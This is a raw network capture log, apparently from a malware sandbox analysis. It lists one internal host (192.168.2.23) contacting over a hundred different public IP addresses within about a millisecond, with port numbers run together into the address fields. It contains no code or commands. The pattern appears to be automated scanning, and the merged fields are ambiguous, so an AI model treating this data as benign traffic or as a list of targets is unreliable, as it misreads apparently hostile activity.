                                              Dec 13, 2024 01:14:30.529716015 CET655005501192.168.2.23169.199.174.168
                                              Dec 13, 2024 01:14:30.529716015 CET655005501192.168.2.23116.180.65.212
                                              Dec 13, 2024 01:14:30.529726028 CET655005501192.168.2.23125.61.118.6
                                              Dec 13, 2024 01:14:30.529726028 CET655005501192.168.2.23189.43.168.99
                                              Dec 13, 2024 01:14:30.529731989 CET655005501192.168.2.23190.207.249.101
                                              Dec 13, 2024 01:14:30.529733896 CET655005501192.168.2.23145.117.97.9
                                              Dec 13, 2024 01:14:30.529737949 CET655005501192.168.2.23111.3.57.236
                                              Dec 13, 2024 01:14:30.529747963 CET655005501192.168.2.2353.129.141.66
                                              Dec 13, 2024 01:14:30.529750109 CET655005501192.168.2.23191.102.205.218
                                              Dec 13, 2024 01:14:30.529758930 CET655005501192.168.2.23183.85.144.204
                                              Dec 13, 2024 01:14:30.529761076 CET655005501192.168.2.23179.45.143.161
                                              Dec 13, 2024 01:14:30.529761076 CET655005501192.168.2.231.77.202.156
                                              Dec 13, 2024 01:14:30.529761076 CET655005501192.168.2.23170.150.7.164
                                              Dec 13, 2024 01:14:30.529762983 CET655005501192.168.2.23130.116.213.40
                                              Dec 13, 2024 01:14:30.529767036 CET655005501192.168.2.23178.141.43.172
                                              Dec 13, 2024 01:14:30.529768944 CET655005501192.168.2.2347.146.142.227
                                              Dec 13, 2024 01:14:30.529769897 CET655005501192.168.2.23130.13.41.18
                                              Dec 13, 2024 01:14:30.529769897 CET655005501192.168.2.2332.192.72.129
                                              Dec 13, 2024 01:14:30.529773951 CET655005501192.168.2.2339.55.62.241
                                              Dec 13, 2024 01:14:30.529781103 CET655005501192.168.2.2354.10.137.250
                                              Dec 13, 2024 01:14:30.529781103 CET655005501192.168.2.23180.210.69.1
                                              Dec 13, 2024 01:14:30.529781103 CET655005501192.168.2.23189.37.9.31
                                              Dec 13, 2024 01:14:30.529782057 CET655005501192.168.2.23114.221.182.126
                                              Dec 13, 2024 01:14:30.529782057 CET655005501192.168.2.23161.68.89.7
                                              Dec 13, 2024 01:14:30.529791117 CET655005501192.168.2.23173.91.13.198
                                              Dec 13, 2024 01:14:30.529794931 CET655005501192.168.2.231.235.17.112
                                              Dec 13, 2024 01:14:30.529797077 CET655005501192.168.2.23221.2.192.49
                                              Dec 13, 2024 01:14:30.529797077 CET655005501192.168.2.23188.54.35.103
                                              Dec 13, 2024 01:14:30.529798031 CET655005501192.168.2.2398.46.28.77
                                              Dec 13, 2024 01:14:30.529797077 CET655005501192.168.2.2345.117.1.179
                                              Dec 13, 2024 01:14:30.529802084 CET655005501192.168.2.2337.107.114.160
                                              Dec 13, 2024 01:14:30.529814005 CET655005501192.168.2.23104.118.0.168
                                              Dec 13, 2024 01:14:30.529824018 CET655005501192.168.2.2362.182.244.226
                                              Dec 13, 2024 01:14:30.529824018 CET655005501192.168.2.2363.160.119.227
                                              Dec 13, 2024 01:14:30.529828072 CET655005501192.168.2.23103.107.185.227
                                              Dec 13, 2024 01:14:30.529828072 CET655005501192.168.2.23103.189.63.171
                                              Dec 13, 2024 01:14:30.529829979 CET655005501192.168.2.23106.94.122.156
                                              Dec 13, 2024 01:14:30.529836893 CET655005501192.168.2.23126.17.157.214
                                              Dec 13, 2024 01:14:30.529850960 CET655005501192.168.2.23190.68.57.99
                                              Dec 13, 2024 01:14:30.529850960 CET655005501192.168.2.23155.178.7.227
                                              Dec 13, 2024 01:14:30.529850960 CET655005501192.168.2.23187.253.235.109
                                              Dec 13, 2024 01:14:30.529855967 CET655005501192.168.2.23180.176.6.123
                                              Dec 13, 2024 01:14:30.529859066 CET655005501192.168.2.2335.238.246.63
                                              Dec 13, 2024 01:14:30.529861927 CET655005501192.168.2.23206.126.241.29
                                              Dec 13, 2024 01:14:30.529861927 CET655005501192.168.2.23218.97.195.59
                                              Dec 13, 2024 01:14:30.529867887 CET655005501192.168.2.23195.89.63.197
                                              Dec 13, 2024 01:14:30.529870987 CET655005501192.168.2.23180.71.75.54
                                              Dec 13, 2024 01:14:30.529871941 CET655005501192.168.2.23141.74.71.142
                                              Dec 13, 2024 01:14:30.529881954 CET655005501192.168.2.23101.11.245.12
                                              Dec 13, 2024 01:14:30.529882908 CET655005501192.168.2.23129.100.217.40
                                              Dec 13, 2024 01:14:30.529894114 CET655005501192.168.2.23185.172.128.64
                                              Dec 13, 2024 01:14:30.529897928 CET655005501192.168.2.23132.76.2.93
                                              Dec 13, 2024 01:14:30.529898882 CET655005501192.168.2.23154.226.27.24
                                              Dec 13, 2024 01:14:30.529901028 CET655005501192.168.2.23216.149.191.17
                                              Dec 13, 2024 01:14:30.529901028 CET655005501192.168.2.2341.179.37.192
                                              Dec 13, 2024 01:14:30.529903889 CET655005501192.168.2.2393.81.119.7
                                              Dec 13, 2024 01:14:30.529907942 CET655005501192.168.2.2312.41.162.11
                                              Dec 13, 2024 01:14:30.529908895 CET655005501192.168.2.23141.3.79.44
                                              Dec 13, 2024 01:14:30.529920101 CET655005501192.168.2.23192.22.197.136
                                              Dec 13, 2024 01:14:30.529920101 CET655005501192.168.2.23184.112.90.71
                                              Dec 13, 2024 01:14:30.529921055 CET655005501192.168.2.23129.88.109.96
                                              Dec 13, 2024 01:14:30.529922009 CET655005501192.168.2.23154.128.12.248
                                              Dec 13, 2024 01:14:30.529922009 CET655005501192.168.2.23135.171.114.109
                                              Dec 13, 2024 01:14:30.529925108 CET655005501192.168.2.23148.63.250.255
                                              Dec 13, 2024 01:14:30.529925108 CET655005501192.168.2.2397.22.231.57
                                              Dec 13, 2024 01:14:30.529925108 CET655005501192.168.2.23219.5.0.242
                                              Dec 13, 2024 01:14:30.529930115 CET655005501192.168.2.2312.228.210.213
                                              Dec 13, 2024 01:14:30.529932022 CET655005501192.168.2.2374.2.128.11
                                              Dec 13, 2024 01:14:30.529932022 CET655005501192.168.2.239.111.239.253
                                              Dec 13, 2024 01:14:30.529932976 CET655005501192.168.2.2323.107.130.94
                                              Dec 13, 2024 01:14:30.529933929 CET655005501192.168.2.2347.175.199.186
                                              Dec 13, 2024 01:14:30.529939890 CET655005501192.168.2.2335.149.77.244
                                              Dec 13, 2024 01:14:30.529939890 CET655005501192.168.2.23182.111.205.202
                                              Dec 13, 2024 01:14:30.529939890 CET655005501192.168.2.23170.153.163.164
                                              Dec 13, 2024 01:14:30.529941082 CET655005501192.168.2.2357.230.88.163
                                              Dec 13, 2024 01:14:30.529943943 CET655005501192.168.2.2337.109.248.236
                                              Dec 13, 2024 01:14:30.529943943 CET655005501192.168.2.232.93.39.75
                                              Dec 13, 2024 01:14:30.529947042 CET655005501192.168.2.23221.114.212.199
                                              Dec 13, 2024 01:14:30.529947996 CET655005501192.168.2.23107.160.44.160
                                              Dec 13, 2024 01:14:30.529947996 CET655005501192.168.2.23172.209.156.30
                                              Dec 13, 2024 01:14:30.529949903 CET655005501192.168.2.23125.156.100.113
                                              Dec 13, 2024 01:14:30.529961109 CET655005501192.168.2.2394.28.114.35
                                              Dec 13, 2024 01:14:30.529961109 CET655005501192.168.2.2340.36.45.113
                                              Dec 13, 2024 01:14:30.529963017 CET655005501192.168.2.23193.181.104.4
                                              Dec 13, 2024 01:14:30.529983044 CET655005501192.168.2.23116.38.244.179
                                              Dec 13, 2024 01:14:30.529983044 CET655005501192.168.2.23108.200.88.27
                                              Dec 13, 2024 01:14:30.529983044 CET655005501192.168.2.23171.158.140.97
                                              Dec 13, 2024 01:14:30.529983044 CET655005501192.168.2.2339.39.95.164
                                              Dec 13, 2024 01:14:30.529984951 CET655005501192.168.2.2352.13.15.103
                                              Dec 13, 2024 01:14:30.529984951 CET655005501192.168.2.23190.12.189.149
                                              Dec 13, 2024 01:14:30.529985905 CET655005501192.168.2.23130.58.74.48
                                              Dec 13, 2024 01:14:30.529985905 CET655005501192.168.2.23176.213.129.70
                                              Dec 13, 2024 01:14:30.529993057 CET655005501192.168.2.23185.116.151.240
                                              Dec 13, 2024 01:14:30.529993057 CET655005501192.168.2.2351.27.108.175
                                              Dec 13, 2024 01:14:30.529997110 CET655005501192.168.2.2395.95.158.35
                                              Dec 13, 2024 01:14:30.529998064 CET655005501192.168.2.23201.120.8.56
                                              Dec 13, 2024 01:14:30.529999018 CET655005501192.168.2.2337.125.80.0
                                              Dec 13, 2024 01:14:30.530004978 CET655005501192.168.2.2378.176.132.145
                                              Dec 13, 2024 01:14:30.530008078 CET655005501192.168.2.2335.158.224.233
                                              Dec 13, 2024 01:14:30.530026913 CET655005501192.168.2.23187.54.15.138
                                              Dec 13, 2024 01:14:30.530030012 CET655005501192.168.2.23112.142.217.157
                                              Dec 13, 2024 01:14:30.530030012 CET655005501192.168.2.2338.172.55.19
                                              Dec 13, 2024 01:14:30.530030966 CET655005501192.168.2.23108.241.87.24
                                              Dec 13, 2024 01:14:30.530030966 CET655005501192.168.2.2336.129.9.31